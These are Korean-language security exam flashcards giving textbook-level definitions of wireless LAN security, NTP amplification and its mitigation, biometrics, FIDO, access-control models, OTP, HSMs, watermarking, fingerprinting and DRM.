▣ 정의
- 무선랜 클라이언트와 100ms 이내의 빠른 초기 링크 설정 기능과 보안링크 설정 달성을 위한 IEEE 국제표준
▣ 등장배경
- 사용자가 이동하면서 Hot Spot을 지나가는 경우가 많음
- 사용자가 한 Cell 내에 머무는 시간이 짧음
▣ 802.11i 보안 적용 구조
- Station (STA) : 네트워크에 연결하는 통신기기
- Authentication Server (AS) : 인증서버
- Access Point (AP)
- Policy Decision Point : Session Decision Token(SDT) 발행하는 포인트
- Policy Enforcement Point : SDT에서 분배된 SET(Session Enforcement Token)으로 세션 설정
▣ 대칭키 계층 구조
1) Pairwise Keys
- Master Key : 접근 결정 표시
- PMK : Pairwise Master Key. 802.11 중간 접근 인가 표시
- PTK : Pairwise Transient Key. 사용가능 키 수집
2) Group Keys
- GTK : Group Transient Key. 임시키 보안, 그룹키 계층구조 정의
▣ 인증 및 키 관리 아키텍처
1) EAP (Extensible Authentication Protocol)
- STS와 AS 사이의 전송 규정
2) 802.1x
- EAP 아키텍처 상속
- EAP 메시지 전송
3) RADIUS
- AP에 의해 프로토콜 초기화 요청/응답 수행
4) EAP-TLS (Extensible Authentication Protocol-Transport Layer Security)
- 802.11i 인증 표준
▣ 802.11i에 의한 인증절차
1) Discovery
- 통신 대상 결정
2) 802.1x authentication
- PMK 생성, Station과 상호인증
3) RADIUS-based key distribution
- AP와 AS 간 인증
4) 802.1x key management
- PTK를 사용한 상호 동기
- GTK 배포
161
Q

SW 보안 테스팅

A
▣ 개념
- SW제품이 배포되기 전에 그 제품의 강건성과 보안성을 확인하여 보안 취약점들을 예방하기 위한 테스트
▣ 목적
- 의도적 오류 발생시 안전한 상태의 유지검증
- 악용될 수 있는 약점의 부재 검증
- 에측 가능한 보안 행위 검증
- 보안 인지 오류 및 예외 처리 검증
- 보안 요구사항 이행 검증
▣ 취약점 시험방법 주요 유형
1) 블랙박스 보안시험
- 소프트웨어 침입 시험
- 실행파일의 보안 오류 주입
- 퍼지 시험
- 역 엔지니어링 시험
- 애플리케이션 취약성 자동 스캔
2) 화이트박스 보안시험
- 코드 보안 검토
- 소스코드 오류 주입
- 컴파일시간 및 런타임결함 탐지
▣ SDLC에서의 취약점 시험 적용 시기
1) 계획 단계
- 문제점 제시/요구사항 도출
2) 분석 단계
- 요구사항 명세 : 위험모델, 공격트리, 오남용 사례
3) 설계 단계
- 아키텍처/상위단계 설계 : 형식 증명
- 상세설계/조립옵션 : 설계 검토, 형식 증명
4) 구현 단계
- 코딩, 컴파일 : 코드 검토, 컴파일 시간 확인, 프로그램 형식 증명
- 컴포넌트 선정 및 조립 : 오류 주입, 퍼지 시험, 역 엔지니어링, 취약점 자동 스캔
5) 테스팅 단계
- 시스템 통합 : 오류 주입, 퍼지 시험, 침입 시험, 취약점 자동 스캔
6) 운용 및 유지보수 단계
- 운용 : 취약점 자동 스캔, 사후 침입 포렌식
- 유지보수 : 패치 영향 분석, 신규버전/컴포넌트 영향 분석
162
Q

NTP (Network Time Protocol)

A

▣ 정의
- NTP 프로토콜을 사용하여 NTL 서버에 최근 접속한 NTP 서버 목록을 요청하여 공격 대상자에게 대량 트래픽을 유발하여 서비스 거부 상태로 만드는 공격
▣ 특징
- UDP 패킷 공격
- 반사 공격
- DNS 증폭
- DDoS 공격
▣ NTP 공격방법
1) 변조 : 공격자는 IP주소를 공격대상의 IP로 패킷을 변조
2) 전송 : 취약한 다수의 NTP서버를 대상으로 monlist 이용한 다수의 쿼리 전송
3) 증폭 : 쿼리를 수신한 NTP 서버는 증폭된 패킷을 변조된 IP(공격대상)로 응답
4) 장애 : 공격대상 서버는 증폭된 다수의 쿼리 수신으로 네트워크 대역폭 고갈
▣ NTP 스택 오버 플로우 공격
1) crypto_recv() : autokey 인증이 활성화 되어 있을 경우 취약점 발생
2) ctl_putdat() : 신뢰되지 않은 호스트로부터 컨트롤 메시지 받기 허용의 경우
3) configure() : 익스플로잇을 위한 추가 인증 필요
▣ NTP 취약점 대응방안
1) 관리적
- 꼭 필요한 서비스가 아닐 경우 제거
2) 물리적
- 망분리, 사내망 NTP 도입
3) 기술적
- ntp.conf 설정파일에서 disable monitor 추가하여 monlist 비활성화
4) 장비측면
- 방화벽 설정, IDS/IPS 설치

163
Q

생체인식시스템

A
▣ 정의
- 살아있는 인간의 신체적, 행동적 특징을 자동화된 장치를 거쳐 측정함으로써 개인식별의 수단으로 활용하는 기술
▣ 특징 (고려사항)
- 보편성
- 유일성
- 영구성
- 획득성
- 성능
- 수용성
- 오인식율과 오거부율
▣ 인증 방법의 유형
- 소유에 대한 인증 : 카드, 키
- 지식에 대한 인증 : ID/PW
- 생체에 대한 인증
▣ 생체인식 시스템 구성
1) Data Collection
- 디바이스, 센서 장치
2) Transmission
- 정보 전송 기능
3) Signal Processing
- 잡음 데이터 제거
4) Generate Templage
5) Template Match
4) Decision Process
5) Storage System
▣ 생체인증 기술의 분류
- 신체적 특징 : 지문, 얼굴, 홍체, 정맥, DNA
- 행동적 특징 : 서명, 음성, 걸음
▣ 생체 인식 기술의 정확성 측정 기준
- 오거부율(FRR, False Rejection Rate)
- 오인식율(FAR, False Acceptance Rate)
- 교차점 (CER, Crossover Error Rate)
164
Q

얼굴인식 시스템

A
▣ 장점
- 가장 자연스러움
- 원격 인증 가능
- 비접촉, 위생적
- 이용자의 거부감이 가장 적음
▣ 단점
- 환경에 민감 (조명, 카메라위치)
- 동일인의 다양성 (머리, 표정, 자세, 엑세서리, 연령)
- 비동일인 유사성 (쌍둥이)
▣ 처리절차
1) 카메라/PC : 영상획득
2) 캡쳐 프로그램 : 영상처리
3) 전처리 : 이미지/객체 처리
4) 패턴매칭 : 얼굴검출, 표준화, 인식
▣ 분석법
1) 주성분 분석법 (Eigen face)
- 노이즈 성분 억제 비교
2) 판별 분석법 (Fisher face)
- 개인 내/개인 간 변동비 최대치 학습
▣ 인식 절차
1) 얼굴등록
- 등록/패턴매칭
2) 얼굴검출
- 영상획득
- 전처리 과정
- 이미지 추출
3) 얼굴인식
- 얼굴 표준화
- 얼굴인식
▣ 얼굴인식 알고리즘 종류
- PCA (Principal Component Analysis)
- FDA (Fisher Discriminant Analysis)
- ICA (Independent Component Analysis)
165
Q

PCA (Principal Component Analysis)

A
▣ 개념
- 얼굴을 가장 잘 표현 할 수 있는 벡터를 찾는 기법
▣ 특징
- 고유벡터로 표현
- 전체 영상공간에서 얼굴을 가장 잘 표현하는 벡터를 찾음
▣ 장점
- 고유얼굴 표현 가능
▣ 단점
- 국부적 특징 추출 어려움
- 영상의 변화가 객체의 변화인지 환경변화 인지 구분이 명확치 못함
166
Q

FDA (Fisher Discriminant Analysis)

A
▣ 개념
- 얼굴의 국부적 특징을 다른 얼굴로 부터 분리 표현
▣ 특징
- 얼굴 특징을 분리 표현이 가능
- 환경변화에 대응
▣ 장점
- 객체의 변화와 그 밖에 다른 요인의 변화를 판별
▣ 단점
- 효율성을 높이기 위해서는 인식을 원하는 객체에 대한 다양한 영상 보유 필요
167
Q

ICA (Independent Component Analysis)

A
▣ 개념
- 주어진 특징으로부터 새로운 특징 추출
▣ 특징
- PCA 분석법 단점 보완
▣ 장점
- 특징이 차원이 커서 분류하기 어려운 문제 해결
▣ 단점
- PCA를 활용한 특징벡터 추출이 선행되어야 함
168
Q

다중 생체 인식 기술 (Multi-model Biometrics)

A

▣ 정의
- 상호 보완적인 생체 정보를 동시에 이용하거나 다중 정합 알고리즘을 이용하는 등의 다중 생체인식 시스템을 위한 기술
▣ 분류
- 다중 센서 : 여러 개의 다른 방식의 센서로 획득
- 다중 생체 특징 : 다수의 서로 다른 생체 정보 사용
- 동일 생체특징의 다중유닛 : 여러 개의 생체 특징 유닛
- 동일 생체특징을 여러번 획득 : 하나의 특징을 하나의 센서로 여러번 획득
- 동일 입력 생체특징 신호에 대한 다중 표현과 매칭 알고리즘 : 하나의 입력된 생체특진 신호를 여러가지 다른 방식으로 표현한 후 여러가지 매칭 알고리즘 사용

169
Q

FIDO (Fast Identity Online)

A
▣ 개념
- 온라인 상에서 패스워드를 사용하지 않고, 사용자가 등록한 다양한 방식의 인증을 통해 사용자를 인증하는 기술
▣ 도입배경
- 안정 + 보안 강화된 차세대 인증 솔루션 요구 증가
- 표준화된 범용 인증 프레임워크
▣ 특징
- 바이오 Metrics 인증 (지문, 얼굴, 심전도)
- 인증 프로토콜과 인증수단 분리
- 공개키 암호화 방식 : PKI, U2F
▣ 구성요소
- FIDO 클라이언트
- FIDO 서버
- FIDO 프로토콜
▣ 동작원리
1. 등록
1) FIDO Client의 로그인 시도
2) 로그인시 사용 가능한 인증토큰 리스트 전송
3) 원하는 인인특 선택 후 본인인증 수행, 키 쌍방 생
4) 생성된 키쌍에서 공개키를 서명하여, FIDO 서보로 전송
5) 선택한 인증토큰과 공개키를 목록화
2. 인증
1) FIDO서버가 클라이언트의 인증에 필요한 난수와 사용가능한 인증토큰을 보내 인증 요청
2) 디바이스에  등록된 인증토큰으로 사용자 인증
3) 서버에 등록된 공개키에 대한 쌍인 비밀키를 복호화하여 전자서명을 생성하고 바로 Response
4. 클라이언트가 보낸 전자서명을 등록된 공개기로 검증
▣ 프로토콜의 종류
1) UAS : 지문, 음성, 얼굴 인식 등 사용자 고유의 생체 정보 인식을 통해 인증
2) U2F : 1차 인증(생체인증) 후, 1회용 보안키를 저장한 동글(Dongle)등을 활용해 2차 인증
170
Q

ACL (Access Control List)

A
▣ 정의
- 정보시스템과 내부 자원에 대한 비 인가된 접근에 대한 감시, 인증, 접근기록, 보안정책에 근거한 권한 부여 기술 및 행정적인 관리의 총칭
▣ 접근통제의 3요소
1) 접근통제 정책 (접근모드 및 접근제한 조건 정의)
- 신분 기반 정책
- 직무 기반 정책
- 규칙 기반 정책
2) 접근통제 메커니즘 (검사통한 불법적 접근방어)
- ACL
- Capability
- Security Level
3) 접근통제 서비스 (보안요구 기능적 모델 표현)
- 기밀성 : 컴퓨터 자원
- 무결성 : 통신 자원
- 가용성 : 정보 자원
▣ 접근 통제 정책
- DAC(Discretionary Access Control) : 임의적 접근 제어
- MAC(Mandatory Access Control) : 강제적 접근 제어
- RBAC(Role-Based Access Control) : 역할기반 접근 제어
▣ 접근 통제 메커니즘
1) ACL(Access Control List) : 접근통제목록
2) CL(Capability List) : 허가 자원 및 권한 목록
▣ 접근 통제 보안 모델
1) Bell-Lapadula (중점:기밀성)
- No-read-up Policy
- No-write-down Policy
2) Biba 모델 (중점:무결성)
- No-write-up Policy
- No-read-down Policy
3) Clack and Wilson (중점:무결성, 상업용 설계
- Well-Formed Transactions
- Separation of Duties
171
Q

DAC (Discretionary Access Control) : 임의적 접근 제어

A
▣ 개념
- 객체의 소유자가 접근 여부를 결정
- 주체 중심의 권한 정의
▣ 접근조건
- 접근인가 규칙 만족 여부
- 인가된 조건범위 여부
▣ 특징
- 허가된 주체에 의한 변경 가능한 하나의 주체와 객체간 관계
- ID기반의 접근통제 (ID도용문제)
- 한 주체가 하나의 객체를 읽고 그 내용을 다른 객체로 복사하는 경우 처음의 객체에 내포된 접근통제 정보가 복사된 객체로 전파되지 않음
▣ 방법
1) CL (Capability List)
- 한 주체에 대해 접근 가능한 객체와 허가 받은 접근 종류 목록
2) ACL (Access Control List)
- 객체관점에서 접근이 허용된 주체들에 대한 접근 권한을 테이블형태로 기술하여 이를 기반으로 접근제어
▣ 적합한 경우
- 구분될 필요가 있는 사용자(개인, 그룹, 직무)가 비교적 소수일 때와 그러한 사용자의 분포가 안정적일때
▣ 부적합한 경우
- 지속적으로 변화하는 환경에는 부적합(해고된 사용자의 접근철회 어려움)
▣ 분류
1) Identity Based DAC
- 신원 기반
- 주체와 객체의 ID에 따른 접근 통제
2) User Based DAC
- 사용자 기반
- 객체의 소유자가 접근 권한을 설정 및 변경할 수 있는 접근 통제
3) Hybrid DAC
- 신원, 사용자 기반 접근 통제 동시 사용
▣ 종류
1) IBP : Industrial Based Policy
- 사용자 별 실행 가능한 타겟 별 목록
2) GBP : Group Based Policy
- 객체에 동일한 허가권이 부여됨 (조직 레벨 권한 관리 용이)
▣ 사례 (Unix 파일 시스템)
- OS계정을 가진 사용자(소유주)가 파일(객체) 생성하면 파일은 해당 계정에 속하게 됨.
- 파일에 대한 접근을 위의 소유주가 설정 가능.(자신/그룹/모든 이에 따라 설 정 가능함)
-접근하려는 유저(주체)는 파일(객체)에 접근 시 통제를 받음
172
Q

MAC(Mandatory Access Control) : 강제적 접근 제어

A

▣ 개념
- 주체와 객체에게 부과된 보안 등급 기반으로 접근 통제 수행
- 관리자만이 정보 자원의 분류를 설정하고 변경
▣ 접근조건
- 요청이 강재적 요청이라는 공리를 만족하는가? (보안공리, 주체/객체의 보안등급 참조)
▣ 특징
- 모든 객체는 정보의 비밀성에 근거하여 보안 등급이 주어지면 허가된 사용자만이 접근할 수 있도록 엄격히 관리됨
- 시스템 성능 문제와 구현의 어려움 때문에 주로 군사용으로 사용
- 객체에 포함된 정보의 비밀성(레이블로 표현된 허용 등급)과 이러한 비밀성의 접근 정보에 대해 주체가 갖는 권한에 근거하여 객체에 대한 접근을 제한 (파일
의 Owner라고 해서 접근 권한을 설정할 수 없음)
▣ 분류
1) 규칙기반
- MLP(Multi-Level Policy) : 허가되지 않은 노출로부터 정보를 보호 (Top Secret, Confidential, Restricted, Unclassfied)
- CBP(Component Based Policy) : 타겟 집합이 다른 타겟들과 분리된 이름의 범주를 갖고 연결됨
2) 관계기반
- 객체에게 접근할 수 있는 시스템 관리자에 의한 통제
▣ 사례 (군사 기밀 문서 접근 통제)
- 주체는 군인으로 비밀인가 2등급, 객체는 비밀문서로서 3등급 주체에 쓰기 권한 부여
- 주체는 객체에 읽을 수는 있으나, 쓰기를 할 수 없음
- 주체가 실수로 객체에 2등급의 비밀을 3등급 객체에 쓴다면 비밀 노출 발생 -> 정보의 기밀성(Confidentiality) 손상 입음.
-군사 조직 등 기밀성(Confidentiality)이 중요한 곳에서는 하위 등급의 data(객체)에 쓰기 권한 부여하지 않는 정책을 실행함.

173
Q

RBAC (Role-Based Access Control) : 역할기반 접근 제어

A

▣ 개념
- 중앙관리자가 주체와 객체의 상호관계를 통제하며 조직 내에서 맡은 역할에 기초하여 자원에 대한 접근허용 여부가 결정됨
- 정보에 대한 사용자의 접근은 개별적인 신분이 아니라 조직 내에서 개인의 역할(또는 직무/직책)에 따라 결정됨
▣ 등장배경
- MAC 한계점 : MAC 적용상 보안등급 설정기준에 한계점
- DAC 한계점 : 접근권한에 대한 명백한 표현과 관리성에 대한 개선 필요
▣ 방법
- 주체의 역할에 따라 조직의 중앙 관리자가 접근할 수 있는 객체를 지정
▣ 특징
- 권한관리 : 할당/회수
- 계층적 역할 분배 : 역할 계층화 상속 가능
- 최소 권한 정책 : 최소 필요 권한만 부여
- 임무의 분리 : 권한 충분자 분리
- 객체 분류 : 업무에 따라 권한 제한
- 데이터 추상화 : Read, Write, Execute 대신 Create, Rebit, Transfer 등으로 추상화

174
Q

Bell-Lapadula 모델 (중점 : 기밀성)

A

▣ 개념
- 수학적 모델로 정보를 극비(Top Secret), 비밀(Secret), 미 분류(Unclassified)로 분류함
- 상위레벨읽기금지정책(No-read-up Policy), 하위레벨쓰기금지정책(No-write-down Policy)
적용
- 정보의 불법적 파괴나 변조보다는 기밀성(Confidentiality) 유지에만 초점
▣ 종류 (상읽금, 하쓰금)
1) 상위레벨 읽기금지 정책(No-read-up Policy)
- 인가 받은 비밀등급이 낮은 주체는 비밀등급이 높은 객체를 읽어서는 안 된다는 보안정책 (기밀성 보호)
2) 하위레벨 쓰기금지 정책 No-write-down Policy)
- 인가 받은 비밀등급 이하의 정보를 수정하지 못하게 하는 보안정책 (읽기는 가능, 쓰기는 불가능)
- 높은 비밀 등급을 인가 받은 주체가 자신이 접근 가능한 비밀정보를 낮은 등급으로 복사하여 정보를 유출시키는 행위를 금지하여 정보의 기밀성을 보호하고자 함
▣ 문제점
- 관리적 측면 미 고려
- 정보의 무결성 배제. 기밀성만 고려 – 데이터의 불법 변경 가능성 존재.
- Read-Down 과 Write-up에 대한 언급이 없음. 즉, 낮은 비밀등급을 가진 주체가 높은 보안 등급을 가진 객체에 쓰기 행위는 가능하다는 뜻이 되므로 무결성 깨질 수 있음(=Blind Write) 상기 문제점을 해결하기 위해 Biba 모델 제시

175
Q

Biba 모델 (중점 :무결성)

A

▣ 개념
- Bell-Lapadula 모델에서 불법 수정 방지 내용을 추가로 정의한 모델로 높은 무결성을 가진 데이터가 낮은 무결성을 가진 데이터와 합쳐져서 무결성이 오염 되는 것을 방지함 (Biba Integrity모델이라고도 함)
- 낮은 비밀등급에서 높은 비밀등급으로 Write를 하지 못하게 함으로써 높은 무결성 을
가진 데이터가 낮은 무결성을 가진 데이터와 합쳐져서 무결성이 오염되는 것을 방지함.
- 상위레벨 쓰기금지 정책(No-write-up Policy) 와 하위레벨 읽기금지 정책(No-read-down
Policy)가 적용됨
▣ 종류 (상쓰금, 하읽금)
1) 상위레벨 쓰기금지 정책(No-write-up Policy)
- 자신의 무결성 접근등급이 객체의 무결성 접근등급보다 높은 경우에만 쓰기 가능
- 높은 무결성을 가진 데이터의 오염을 방지하기 위한 것임.
2) 하위레벨 읽기금지 정책(No-read-down Policy)
- 자신의 무결성 접근 등급보다 객체의 무결성 접근등급이 높은 경우에만 읽기 가능

176
Q

Clack and Wilson 모델 (중점 : 무결성, 상업용 설계)

A
▣ 개념
- 상업 환경에서 적합하게 개발된 불법 수정 방지를 위한 접근 통제 모델
- 금융자산의 관리, 회계 등의 분야에 주로 적용됨
▣ 종류
1) Well-Formed Transactions
- 모든 거래 사실을 기록하여 불법거래를 방지하는 완전하게 관리되는 자료처리 정책
2) 임무분리의 원칙(Separation of Duties)
- 모든 운영과정에서 어느 한 사람만이 정보를 입력, 처리하게 하지 않고 여러 사람이
각 부문별로 나누어 처리하게 하는 정책
177
Q

OTP (One Time Password)

A
▣ 정의
- 고정된 비밀번호 대신 무작위로 생성되는 일회성 비밀번호를 이용하여 사용자를 인증하는 방식
▣ 특징
- 휘발성 : 1분마다 자동 갱신
- 보안성 : 시간, 임의의 숫자, 문자
- 안정성 : 스니핑, 해킹 불가
▣ 구성요소
- OTP Token
- Secret Key
- Time Window
- 인증서버
- function f : MD5, SHA
▣ 방식에 의한 분류
1) Challenge Response
- Challenge : 난수
- Response : 비밀키 입력
- 응답속도 : 다소 느린 응답 속도
2) S/Key
- Code Book : 일회용 패스워드로 부터 저장된 직전의 일회용 패스워드 (X+1) 에서 추출 비교
3) Time Synchronous
- Token : 시계가 Seed 역할
- 동기화 : 시계를 통한 동기화
- 패스워드 : Pin + 일회용 PW
- 시간편차  OTP, Time sleeping, 실패 가능성
4) Event Synchronous
- OTP생성버튼을 누를 때마다 새로운 OTP값 생성
- 인증 횟수 기록 공유
- 인증 기록으로 부터 카운터 값을 알아 내고 이값을 하나 증가 시킨후 사용자 비밀키를 이용해 OTP 생성
5) 조합(Time-Event Sync)
- 특정 시간간격 마다 비밀번호가 다시 생성되고 같은 시간간격 내에서도 생성버튼을 누르면 카운트 값을 증가시켜서 비밀번호가 변하도록함
▣ 동기 비동기 방식
1) 비동기 방식 : 난수, Challenge-Response
2) 비동기 방식 : 시간, 이벤트, 시간-이벤트
▣ 인증 프레임워크
- 기본 모델
- 중앙집중형 모델
- 확장 집중형 모델
- 크로스 도메인 모델
178
Q

OTP 비동기 방식

A
▣ 정의
- 사용자가 직접 임의의 난수 값을 OTP에 입력함으로써 OTP 값이 생성되는 방식
▣ 장점
- 사용자가 직접 입력해야 하므로, 전자금융사고 발생시 책임 소재 확인 가능
▣ 단점
- 사용자 입력의 번거로움
- 네트워크 부하 발생
- ID/PW 와 호환이 용이하지 못함
▣ 절차
1) 로그인 정보
2) 로그인 정보 확인
3) 질의 값 (Challenge)
4) 질의 값을 토큰에 입력하여 OTP 값 생성
5) 응답 값 (Response)
▣ 방식
- Challenge-Response : OTP 인증 서버로부터 받은 질의 값을 사용자가 직접 OTP 토큰에 입력하고 생성된 OTP 값을 응답 값으로 전송하여 인증하는 방식
179
Q

OTP 동기 방식

A
▣ 정의
- OTP토큰과 인증서버 사이에 동기화되는 기준 값에 따라 OTP값이 생성
▣ 장점
- 별도의 질의 값 관리 불필요
- 네트워크 부하 적음
- ID/PW 와 호환성 높음
▣ 단점
- OTP 토큰과 인증서버간에 기준 값(시간, 카운트횟수 등)이 동기화 되어야함
▣ 동기화방식
- 시간 : 매분 마다 자동 생성
- 이벤트 : 요청 시 생성
- 시간-이베트 : 동기화 시간 값 + 동일한 카운드 값을 기준으로 생성
▣ 절차
1) 로그인 정보
2) 로그인 정보 확인
3) OTP 값
4) 응답 값 비교하여 사용자 인증 수행
180
Q

HSM (Hardware Security Module)

A
▣ 정의
- HW내에서 암호화 키를 생성하고 저장하는 모든 장비
▣ 특징
- 작은용량
- USB
▣ 보안토큰 구성
- MS CSP : MS익스플로러
- PKCS#11 : 넷스케이프
- PC/SC : 커스텀 유저
▣ 인증 프로세스
1) 기준 : RSA 1024bit 사용
2) 인증서 발급
3) 사용자 인증
181
Q

바이오 보안토큰(BHSM : Biometric Hardware Security Module)

A
▣ 개념
- 바이오 인식 센서와 바이오 인식 정보를 처리할 수 있는 MCU(Microcontroller Unit), 스마트카드로 구성된 USB 형태의 하드웨어 보안 기기
▣ 구성도
- 스마트 카드 : 개인키 및 인증서 저장
- MCU : 바이오 정보 저장
- BIO 센서 : 바이오 정보 취득
▣ 구성요소
- BIO 센서 : 생체정보 인식
- MCU : 바이오 정보 처리
- 보안토큰 : 개인키, 공인인증서
- USB : PC연결 단말
- 연결핀 : 모바일 연결
▣ 보안위협
- 허용되지 앟은 센서를 통한 자료 수집
- 바이오 DB 자료의 오용
- 오염된 바이오DB를 통한 잘못된 비교
- 모바일 장치의 분실 등 바이오 DB 정보 유출
- 잘못된 캡쳐 바이오 정보의 전송
- 캡쳐 후 수집되는 바이오 정보에 대한 서버 집중화로 대량의 바이오 정보 유출 가능
- 전송 채널에 대한 공격
- 센서에 대한 오용
- 캡쳐되는 바이오 정보에 대한 탈취
- 모바일 장치의 분실등을 통한 바이오DB 정보의 유출
▣ 대응방안
- 센서와 모바일 장치 상호 인증
- 바이오 DB의 암호화
- 센서, 모바일 장치, 서버에 대한 인증
- 전송 채널 암호화
- 전송된 자료 암호화
- 센서와 애플리케이션에 대한 인증
182
Q

디지털 컨텐츠 보안

A
▣ 주요특징
- 유통측면 : 유통경로 다양, 최초 유통경로 파악 어려움, 확산이 빠름
- 품질측면 : 복제본 품질 우수
- 제품측면 : 저작권 보호 및 식별 어려움
▣ 기술요소
1) 디지털 컨텐츠 추적 기술
- WaterMarking
- FingerPrinting
2) 디지털 컨텐츠 관리 기술
- DRM, MPEG-21, SRM, Scamble
3) 디지털 컨텐츠 식별 기술
- DOI, Indecs, XrML, ODRL
183
Q

WaterMarking

A
▣ 개념
- 디지털 컨텐츠에 저작권 관련 정보를 넣어 인증 기능을 부여함으로써 불법 복제 및 배포를 방지하고 제작자의 저작권과 관련된 권리를 주장할 수 있게 하는 기술
▣ 필요성
- 컨텐츠 보호
- 저작권 보호
- 불법복제 추적
▣ 특징
- 비인지성 : 인지불가, 원본품질 유지
- 견고성 : 변형에 대한 견고성
- 연약성 : 워터마크 깨짐 (워터마크는 복제 불가능)
- 위조방지
- 키 제한 : 소수의 사용자만 워터마크 추출 키 제공
▣ 생성/삽입/검출 프로세스
- Original Image
- Watermark Information
- KEY
- Watermarked Image
▣ 필요기술
1) 생성 기술
- 이진영상, 키 문자열, 유사잡음신호
2) 삽입 기술
- 공간영역, 주파수영역
3) 추출 기술
- 블라인트, 넌 블라인드
▣ 워터마킹의 주요 유형
1) 삽입 방법에 따른 유형
- 공간영역 삽입
- 주파수영역 삽입
2) 용도에 따른 유형
- 디지털 워터마킹
- 스테가노 그라피
- 핑거프린팅
3) 강인성에 따른 유형
- 강성 워터마킹
- 연성 워터마킹
4) 시각화에 따른 유형
- 보이는 워터마킹
- 보이지 않는 워터마킹
5) 저작물에 따른 유형
- 이미지, 오디오, 비디오, 벡터, 텍스트
▣ 주요 공격기법
- Filtering Attack : Low Pass filtering으로 워터마크 지움, 품질 저하됨
- Copy Attack : 워터마크 신호 측정 후 마킹되지 않은 임의의 신호로 바꿈
- Mosaic Attack : 워터마크된 신호를 작게 조각 낸 후 다시 마춤
- IBM Attack : 원래 원터마크에 또다른 워터마크 삽입, 소유권 분쟁 일으킴
- Template Attack : 패턴삽입, 패턴파괴
184
Q

FingerPrinting

A
▣ 개념
- 디지털 컨텐츠에 저작권 정보화 구매한 사용자의 정보를 삽입하여 컨텐츠 불법 배포자 추적을 가능하게 하는 기술
▣ 특징
- 비가시성 : 핑거프린트 삽입여부 은닉
- 견고성 : 재샘플링, 압축, 기하학적 영상변환에도 핑거프린트 유지
- 유일성 : 동일 컨턴츠에 사용자마다 각각 다른 정보 삽입
- 역추적성 : 배포자 역추적
- 공모위협 : 핑거프린트 정보 삭제하거나 생성 하는것 불가 해야함
- 익명성 : 구매자의 익명성 보장
- 조건부 추적성 : 합법구매자는 익명유지, 불법적 배포자는 추적
▣ 핑거프린팅의 암호학적 기법
1) 대칭형 핑거프린팅
- 초기의 기법
- 구매자 판별 프로토콜, 구매정보 DB 로 구성
- 판매자, 구매자 모두 핑거프린팅 컨텐츠에 접근 가능
- 불법 복제시 책임 규정 불분명
2) 비대칭형 핑거프린팅
- 대칭형 핑거프린팅 보완
- 구매자만 핑거프린팅 컨텐츠에 접근
- 불법 배포 발견시 신뢰된 제3자를 통해 증명
- 키생성, 핑거프린팅, 판별, 분쟁해결의 4가지 알고리즘으로 구성
▣ 공모공격
- 여러 개의 콘텐츠를 서로 비교하여 핑거프린팅 정보를 삽입할 수 있는 공격
▣ 공모공격의 유형
- 평균화 공격 : 다수 컨텐츠 서로 평균화하여 새로운 컨텐츠 생성
- 최대최소 공격 : 최대/최소값의 평균값으로 새로운 컨텐츠 생성
- 상관계수 음수화 공격 : 상관계수의 값을 음수로 만들어 공모자 검출을 어렵게 만듦
- 상관계수 제로화 공격 : 상관계수를 0에 가깝게 유도
- 모자이크 공격 : 기하학적 모양으로 작게 나누어 새로운 컨텐츠 생성
▣ 보안강화 기술
1) 공모보안 코드
- c-secure 코드 : 제한된 공모자 환경에서 강함, 코드 간단 추측 쉬움, 공모자 증가하면 코드길이 기하급수적 증가
- d-detecting 코드 : 공모자 2명인 경우 모든 공모자 색출, 단순하고 추정 쉬움
- 3-secure 코드 : 3명의 공모자 색출, 코드 길이 작음
2) 듀얼 워터마킹/핑거프린팅
- 워터마킹 + 핑거프린팅
185
Q

DRM (Digital Rights Management)

A
▣ 정의
- 디지털 컨텐츠의 생성에서 이용까지 유통 전 과정에 걸처 디지털 컨텐츠를 안전하게 관리/보호하고, 부여된 권한정보에 따라 디지털 컨텐츠이 이용을 제어/통제하는 기술
▣ 특징
- 투명성, 사용성, 유통성
▣ 구성도
- 컨텐츠제공자(패키저, 컨텐츠, 메타 데이터)
- 컨텐츠분배자(컨텐츠 상거래)
- 컨텐츠 소비자(응용프로그램, DRM컨트롤러, 보안 컨테이너, 라이센스)
- 클리어링 하우스(권한 정책, 라이센스)
▣ 구성요소
- 컨텐츠 제공자 : 저작권자
- 컨텐츠 분배자 : 쇼핑몰
- 패키저 : 배포 준비
- 보안 컨테이너 : 전자 보안
- DRM 컨트롤러 : 이용 권한 통제
- 클리어링 하우스 : 키 관리, 라이센스 발급 관리
▣ 기술요소
- 암호화 : PKI, Encryption, Digital Signature
- 키관리 : Centralized, Enveloping
- 암호화 파일 : Pre-Packaging
- 식별기술 : DOI, URI
- 저작권 표현 : ODRL, XrML, MPEG-21
- 정책관리 : XML
- 크랙방지 : Secure DB, Encryption
- 인증 : SSO
- 인터페이스 : IPMP
- 이벤트 보고
- 사용권한
▣ 세부 기술요소
1) 컨텐츠 패키징 기술
- 컨텐츠 패키징 구조
- 컨텐츠 파일 포맷 설게
- 복합 컨텐츠 패키징
- 컨텐츠 암호화
2) 권리 표현 기술
- 권리 데이터 사전
- XML 기반 권리표현 언어
- 다이나믹 사용규칙 표현
- 저작권 관계 표현
3) 워터마킹/핑거프린팅 기술
- 워터마킹
- 핑커프린팅
- 공격 및 평가
4) 복제방지기술
- 디바이스 인증
- 비밀키 교환
- 디바이스 폐기/회복
- 암호화
5) 컨텐츠 식별 체계
- 식별자 구문 구조
- 식별자 변환
- 식별 메타데이터 관리
6) DRM 도메인 간 상호연동
- DRM 간 상호 인증 처리
- DRM Adaptation
- 훼손된 DRM 모듈 폐기 처리
186
Q

DOI (Digital Object Identifier)

A
▣ 정의
- 디지털 저작물에 특정한 번호를 부여하는 일종의 바코드 시스템으로 디지털 저작물의 저작권 보호 및 정확한 위치 추적이 가능한 시스템
▣ 특징
- 인식성 : URL 보다 정확
- 변환용이성 : URL 변환 용이
- 응용성 : ISBN 기존체계 수용
- 운용성 : 메타데이터 호환
- 권리표기 : 유료화 소유권
- 영구식별 : 주소변경에 무관
▣ 구조
- Prefix(디렉토리.등록번호)
- Suffix([코드] ItemID)
▣ 동작절차 구성요소
- DOI 선택 : 브라우저 DOI 선택
- URL 검색 : DOI 관련 URL찾음
- URL 전송
- URL 접근
- 컨텐츠 접근
187
Q

INDECS (Interoperability of Data in E-Commerce System)

A
▣ 정의
- 디지털 환경하에서 컨텐츠 저작권 보호를 위한 목적으로 통일된 형태의 전자상거래의 정보 교환을 위한 지적재산권 관련 메타데이터 모델
▣ 특징
- 유럽 주도 프로젝트
- 이벤트 중심의 상거래
- 유통, 저작권 처리 XML,RDF기술
- 고유 식별성, 기능적 세분성, 적절한 접근 원칙
- DOI와 연동 가능
▣ 구성요소
- Entity : 식별 자원, 4 view (일반, 상업, 지적재산권, 특수)
